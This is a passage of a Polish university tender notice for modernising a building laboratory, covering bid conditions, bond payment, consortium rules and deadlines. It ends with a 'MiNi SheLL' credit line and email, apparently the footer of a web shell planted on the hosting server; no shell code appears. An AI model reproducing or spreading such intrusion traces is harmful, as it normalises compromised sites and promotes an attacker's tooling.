określ., czy te roboty budowl. zostały wykon. należycie, przy czym dowodami, o których mowa, sąreferencje<br/>bądź inne dokum.sporz. przez podm., na rzecz którego rob. budowl. zostały wykonane, a jeżeli wykonaws. zprzyczyn niezależ. od<br/>niego nie jest w stanie uzyskać tych dokum. – inne odpowiednie dokum. - Wzór wykazu stanowi Załnr 7 doSWZ. Wykon. może w<br/>celu potwierdz. spełn. war udz. w postęp., w stosownych sytuacjach oraz w odniesieniu do konkretnegozamów, lub jego części,<br/>polegać na zdoln.techn. lub zawod. lub syt. finans.lub ekon. podm.udostępn.zasoby, niezalez.od char.prawnego łączących go z nim<br/>stos. prawnych, z zastrzeż, że w odniesieniu do warun. dot.wykszt., kwalif. zawod. lub dośw. Wykon. może polegać na zdoln.<br/>podmiotów udostępn. zasoby, jeśli podm.te wykonająroboty bud. lub usługi, do realizacji których te zdoln. są wymagane, art. 118 ust.<br/>1 oraz 2 uPzp. 2.Zgodnie z art. 118 ust. 3 oraz4 u Pzp Wyk. który polega na zdoln.. lub syt. innych podmiotów na zas.określ w art.<br/>118 ust. 1 uPzp,wraz z ofertą, składa zobow. podm. udost. zasoby do oddania mu do dyspoz. niezbędnych zasob na<br/>potrzebyrealizacji danego zamów. lub inny podm. śr. dow. potw., że wykon. realizując zamów., będzie dysp. niezbędnymi zasob.tych<br/>podm.. Zobow., o którym mowa w zd pierwszym potw., że stosunek łączący Wyk. z podm.udostępniającymi zasoby gwarantuje<br/>rzeczyw. dostęp do tych zasob. oraz określa w szczeg.: a)zakres dostęp. Wykon.zasobów podm. udostępniającego zasoby;<br/>b)sposób i okres udost.Wykon. i wykorzyst. przez niego zasob. podmiotu udostępn. te zasoby przy wykon. zamów.; c)czy i w jakim<br/>zakresie podm udost zasoby, na zdoln. któregoWykon. polega w odniesieniu do war. udziału w postępow. dot. wykszt., kwalif.<br/>zawod. lub doświadcz., zrealizuje robotybudow. lub usługi, których wskazane zdoln. dotyczą.3.Podmiot, który zobowiązał się do<br/>udostępn. zasob., odpow. solidarnie z wykon., który polega na jego syt.finans. lub ekonom., za szkodę poniesioną przez zamaw.<br/>powstałą wskutek nieudostępn.tych zasob., chyba że za nieudostępn. zasobów podmiot ten nie ponosi winy, art. 120 Ustawy Pzp<br/>4.Zgodnie z art. 122 UstawyPzp Jeżeli zdoln. techn. lub zawod. lub syt. ekonom. lub finans., podmiotu udostępn. zasoby,<br/>niepotwierdzają spełn. przez Wykon. war. udziału w postęp. lub zachodzą wobec tych podm. podstawy wykl., Zamaw.zażąda, aby<br/>Wykon. w terminie określ. przez Zamaw.:a)zastąpił ten podmiot innym podm. lub podm.lub b)wykazał, żesamodzielnie spełnia<br/>war.udziału w post..5.Zamaw. oceni, czy udostępniane Wykon. przez podm.udostępniające zasoby zdolności techn. lub zawod. lub<br/>ich syt. finans lub ekonomiczna, pozwalają na wykaz. przez Wykon. spełniania war. udz. w postępow. z zakresu syt. ekonom. lub<br/>finansowej oraz zdolności technicznej lub zawodowej. oraz zbada, czy niezachodzą wobec tego podmiotu podst. wykluczenia, które<br/>zostały przewidz. wzgl. wykonawcy. 6.Zamaw. żąda także od Wykonaw,który polega na zdoln. techn. lub zawodow. lub syt. finans.<br/>lub ekonomicznej podm. udostępn. zasoby nazasad.określ. w art. 118 uPzp, przedstawienia podm. środ. dowod. wymien. w Rozdz.<br/>X Ppkt 2.1.2 SWZ, dot.tych podm.potwierdz, że nie zachodzą wobec tych podm. podst. wyklucz. z postępow.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W niniejszym postępowaniu do upływu terminu składania ofert Wykonawcy zobowiązani są złożyć ofertę, na którą<br/>składają się:<br/>a) Wypełniony Formularz Oferty, sporządzony na wzorze stanowiącym Załącznik nr 1 do SWZ w postaci elektronicznej i<br/>opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>b) Oświadczenie/a w trybie art. 125 ust. 1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu na dzień<br/>składania ofert, braku podstaw do wykluczenia Wykonawcy, sporządzone na wzorze stanowiącym Załącznik nr 3 do SWZ<br/>jako własne oświadczenie Wykonawcy pod rygorem nieważności, w postaci elektronicznej, opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>c) Oświadczenie/a w trybie art. 125 ust. 1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu na dzień<br/>składania ofert braku podstaw do wykluczenia Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia,<br/>sporządzone na wzorze stanowiącym Załącznik nr 3 do SWZ jako własne oświadczenie Wykonawcy pod rygorem<br/>nieważności, w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym (jeżeli dotyczy),<br/>d) Oświadczenie w trybie art. 125 ust. 5 Ustawy Pzp, sporządzone na wzorze stanowiącym Załącznik nr 4 do SWZ dla<br/>każdego podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu, w zakresie w jakim<br/>Wykonawca powołuje się na jego zasoby, pod rygorem nieważności, w postaci elektronicznej, opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym - o ile wykonawca polega na zasobach innych<br/>podmiotów (jeżeli dotyczy),e) Pełnomocnictwo do złożenia oferty sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (jeżeli umocowanie osoby<br/>wskazanej w ofercie nie wynika z dokumentów rejestrowych), a ofertę składa pełnomocnik.<br/>f) Pełnomocnictwo dla lidera konsorcjum, wspólnika spółki cywilnej (jeżeli oferta składana jest przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia) - sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (jeżeli dotyczy)<br/>g) Zobowiązanie/a podmiotu trzeciego do udostępnienia zasobów (jeśli dotyczy) - w postaci elektronicznej i opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (jeżeli dotyczy),<br/>h) oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji<br/>zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji (jeżeli Wykonawca zastrzega takie informacje) - w postaci elektronicznej i opatrzonej kwalifikowanym<br/>podpisemelektronicznym, podpisem zaufanym lub podpisem osobistym (jeżeli Wykonawca zastrzega takie informacje),<br/>i) dokumenty, z których wynika prawo do podpisania oferty; tj. odpis lub informacja z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/>j) Dokument potwierdzający wniesienie wadium zgodnie z zapisami Rozdziału XVIII SWZ w pieniądzu – wpływ na konto<br/>Zamawiającego lub w formie gwarancji/poręczenia złożony wraz z Ofertą – oryginał w postaci elektronicznej i opatrzony<br/>kwalifikowanym podpisem elektronicznym<br/>2. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 1i) jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów w Formularzu Oferty – Załącznik nr 1 do SWZ lub w Załączniku nr 3 lub 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zadanie 1 i 2 – 7 000,00 PLN / słownie : siedem tysięcy złotych/<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w wrt. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019 r. poz. 310, 836,1572)<br/>3. Wadium wnoszone w pieniądzu, Wykonawca wpłaca przelewem na rachunek bankowy Politechniki Łódzkiej:<br/>PEKAO S.A. II O/ ŁÓDŹ 25 1240 3028 1111 0000 2822 2228 (wadium do postępowania W6.262.7.ZP.2023 na<br/>modernizację Laboratorium KBB w budynku B7 Wydziału Budownictwa, Architektury i Inżynierii Środowiska Politechniki<br/>Łódzkiej w systemie „zaprojektuj i wybuduj”).<br/>4. Jeżeli wadium jest wnoszone w formie innej niż pieniądz tj. w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Wykonawca składa wadium w formie poręczenia lub gwarancji wraz z ofertą załączając dokument na Platformie w<br/>zakładce „OFERTY” – poprzez wybranie polecenia „dodaj dokument&#34;. Wadium musi zabezpieczać ofertę przez cały okres<br/>związania ofertą.<br/>6. Wadium należy wnieść przed upływem terminu składania ofert. Za wadium wniesione w terminie uważa się:<br/>1) dla wadium wnoszonego w formach innych niż pieniądz – datę przesłania dokumentu na Platformę,<br/>2) dla wadium wnoszonego w pieniądzu – datę uznania rachunku bankowego przez bank Zamawiającego przed upływem<br/>terminu składania ofert (decyduje data i godzina wpływu środków na rachunek Zamawiającego). Z uwagi na ryzyko<br/>związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym<br/>wyprzedzeniem.<br/>7. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokumenty te powinny być<br/>sporządzone zgodnie z obowiązującym prawem i zawierać co najmniej:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/ poręczyciela,<br/>oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją /poręczeniem,<br/>3) kwotę wadium,<br/>4) termin ważności gwarancji /poręczenia – nie krótszy niż termin związania ofertą,<br/>5) obowiązanie gwaranta/poręczyciela do zapłacenia kwoty wadium bezwarunkowo na pierwsze pisemne żądanie<br/>Zamawiającego w sytuacji, jeżeli:<br/>a) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 Ustawy Pzp, z przyczyn<br/>leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych<br/>potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 Ustawy Pzp, oświadczenia, o którym mowa w<br/>art. 125 ust. 1 Ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowaw art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,<br/>b) Wykonawca, którego oferta została wybrana:<br/>i. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>ii. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>iii. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,<br/>którego oferta została wybrana. W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji,<br/>Zamawiający nie uzna dokumentów, które nie spełniają wymagań, o których mowa w pkt 6 Rozdziału XIX SWZ.<br/>Szczegółowy opis wymagań zawiera Rozdział XVIII SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty w postaci elektronicznej.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w art.<br/>125 ust. 1 Ustawy Pzp, dotyczące wykazania spełnienia warunków udziału w postępowaniu oraz braku podstaw<br/>wykluczeniaskłada każdy z Wykonawców wspólnie ubiegających się o zamówienie – Załącznik nr 3 do SWZ. Oświadczenia<br/>te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą udokumentować, że łącznie spełniają warunki<br/>określone przez Zamawiającego.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5. W Formularzu Ofertowym należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (Ten sam Wykonawca może być członkiem tylko jednego konsorcjum);<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego (tzw. lidera). Pełnomocnictwo winno być załączone do oferty w postaci elektronicznej.<br/>7. Pełnomocnictwo składane jest w oryginale opatrzone kwalifikowanym podpisem elektronicznym lub w przypadku kopii<br/>pełnomocnictwa wymaga się pozyskania notarialnego uwierzytelnienia odpisu pełnomocnictwa opatrzonego kwalifikowanym<br/>podpisem elektronicznym notariusza, zgodnie z art. 97 ust. 2 ustawy z dnia 14 lutego 1991r. Prawo o notariacie (t.j. Dz.U.<br/>2022, poz. 1799 ze zm.).<br/>8. Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>9. Zgodnie z art. 117 ust. 4 Ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają w<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy treść<br/>oświadczenia zawiera Formularz Oferty stanowiący Załącznik nr 1 do SWZ.<br/>10. Zgodnie z art. 445 ust. 1 Ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>11. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia stosuje się odpowiednio.<br/>12. Zgodnie z art. 58 ust. 5 Ustawy Pzp, zapisy SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>13. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) żaden z Wykonawców nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 108 ust.<br/>1 ustawy oraz art. 7 ust.1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego;<br/>b) przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie muszą spełniać warunki udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian do umowy zawiera wzór umowy Załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zamawiajacego /plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamaw. dopuszcza możl. powierzenia wykonania części zamów. podwykonawcy. Żąda jednak, aby wykon. wskazał<br/>części zamów. której wykonanie zamierza powierzyć podwykonawcom. Zamaw. żąda podania tej informacji w Form. oferty-<br/>Zał.nr1doSWZ,oraz podania, o ile są już znane, nazwy (firmy) tych podwykonawców oraz ich proc. udział w realizacji<br/>zamówienia. INNE PRZESŁ. WYKLUCZENIA WYKON. NA PODST. ART. 7 UST. 1 ustawy z3kwietnia2022r. o<br/>szczeg.rozwiązaniach w zakr. przeciwdział. wspieraniu agresji na Ukrainę oraz służ. ochronie bezp. narodowego. W zw. z<br/>obowiąz.wynik. z art.7Ustawy :1. Z postęp. o udziel. zam. publ. lub konkursu prowadzon. na podst.ustawy<br/>zdnia11września2019r.Pzp wyklucza się:a) Wyk. oraz uczestnika konkursu wymien. w wykaz. określ. w rozporz. 765/2006 i<br/>rozporz. 269/2014 albo wpis. na listę na podst. decyzji w sprawie wpisu na listę rozstrzy. o zastos. środka, o którym mowa<br/>wart. 1 pkt 3 Ustawy;b) Wyk. oraz uczestnika konkursu, którego beneficj. rzeczywistym w rozum. ustawy z<br/>dnia1marca2018r.o przeciwdz. praniu pieniędzy oraz finansow.terroryzmu (Dz.U.z2022 r.poz. 593i655) jest osoba wymien.w<br/>wykazachokreśl. w rozporz. 765/2006 i rozporz. 269/2014 albo beneficjentem rzeczyw. od dnia 24 lutego 2022 r., o ile<br/>została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastos. środka, o którym mowa w<br/>art. 1 pkt 3;c) Wyk.oraz uczestnika konkursu, którego jedn. dominującą w rozum. art. 3 ust. 1 pkt 37 ustawy z dnia<br/>29września1994 r. orachunkowości (Dz.U.z2021 r. poz.217, 2105 i 2106) jest podmiot wymieniony w wykazach określ. w<br/>rozporz. 765/2006 irozporz. 269/2014 albo wpisany na listę lub będący taką jedn. dominującą od dnia 24 lutego 2022 r., o ile<br/>został wpisany na listę na podst. decyzji w sprawie wpisu na listę rozstrzygającej o zastos. środka, o którym mowa w art. 1<br/>pkt 3. 2.Wykluczenie następ. na okres trwania okoliczności określ. w ust. 1. 3. W przyp. Wyk. lub uczestnika<br/>konkursuwykluczonego na podst. ust. 1, Zamaw.odrzuca wniosek o dopuszcz. do udziału w postęp. o udzielnie zam. publ<br/>lub ofertętakiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złoż. oferty wstępnej, oferty podl. negocjacjom,<br/>ofertydodat., oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim<br/>Wykonawcąnegocjacji lub dialogu, odrzuca wniosek o dopuszcz. do udziału w konkursie, nie zaprasza do złoż. pracy<br/>konkurs. lub nieprzeprow. oceny pracy konkurs., odpow. do trybu stosow. do udziel. zam. publ oraz etapu prowadzon.<br/>postęp. o udziel.zam.publ. 1.Zamaw. nie wymaga ale zaleca, aby złoż. oferty poprzedz. było odbyciem wizji lokalnej oraz<br/>sprawdz. dokum.dot. zamów. jakie znajdują się w dyspoz. Zam., a jakie będą udostępniane podm. zgłasz. chęć udziału w<br/>postęp. zainteresowane osoby prosimy o kontakt telefoniczny podany w Rozdz. VI SWZ.1Zamawiający wymaga, aby<br/>zamówienie zostało zrealizowane przez Wykonawców w następujących terminach:Zadanie nr 1 – sporządzenie<br/>dokumentacji projektowej wraz z modernizacją posadzki w hali Laboratorium KBB WBAiIŚ PŁ– rozpoczęcie prac od dnia<br/>podpisania umowy, zakończenie całości prac - nie później niż do dnia 31 stycznia 2024 r., z następującymi<br/>zastrzeżeniami:1.1.sporządz. dokumentacji projektowej wraz z jej zatwierdzeniem – w terminie 30 dni od dnia podpis.<br/>umowy;1.2.wykonanie modernizacji posadzki– od dnia zatwierdz. dokumentacji projektowej – (min. 4 miesiące), nie później<br/>niż do 30 czerwca 2024 r.//Zadanie nr 2–sporządz. dok.projektowej wraz z modernizacją ścian i sufitu w hali Laboratorium<br/>KBB WBAiIŚ PŁ–rozpocz. prac od dnia podpis. umowy, zakończ. całości prac nie później niż do dnia 30 czerwca 2024r., z<br/>następującymi zastrzeżeniami:1.1.sporządz. dok. projektowej wraz z jej zatwierdzeniem–w terminie 30 dni, nie<br/>później niż do dnia wykonania posadzki w Zadaniu 1.//1.2.wykonanie modernizacji ścian i sufitu–od dnia zatwierdzenia<br/>dok.projektowej–w terminie min. 6 tygodni , nie później niż do 30 czerwca 2024r.

Creat By MiNi SheLL
Email: jattceo@gmail.com